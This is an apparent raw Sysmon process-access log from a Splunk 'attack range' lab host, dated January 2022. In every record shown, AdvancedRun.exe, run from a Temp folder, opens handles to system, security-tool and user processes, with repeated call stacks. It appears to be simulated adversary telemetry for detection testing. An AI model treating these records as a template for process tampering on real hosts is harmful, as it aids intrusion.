SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B9E-61E7-8306-000000002402}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B98-61E7-7A06-000000002402}6584C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.756{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B90-61E7-4D06-000000002402}3064C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1B8F-61E7-4906-000000002402}6604C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1A83-61E7-1306-000000002402}6808C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-19DC-61E7-B505-000000002402}7112C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1897-61E7-9802-000000002402}5612C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-1896-61E7-9302-000000002402}4112C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-181A-61E7-5902-000000002402}6116C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.755{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0FC8-61E7-5701-000000002402}4600C:\Users\Administrator\Desktop\bacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F900-000000002402}5304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DCB-61E7-F800-000000002402}5296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F100-000000002402}4980C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-F000-000000002402}4892C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC1-61E7-EE00-000000002402}4728C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.754{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0DBF-61E7-E700-000000002402}4232C:\Windows\system32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 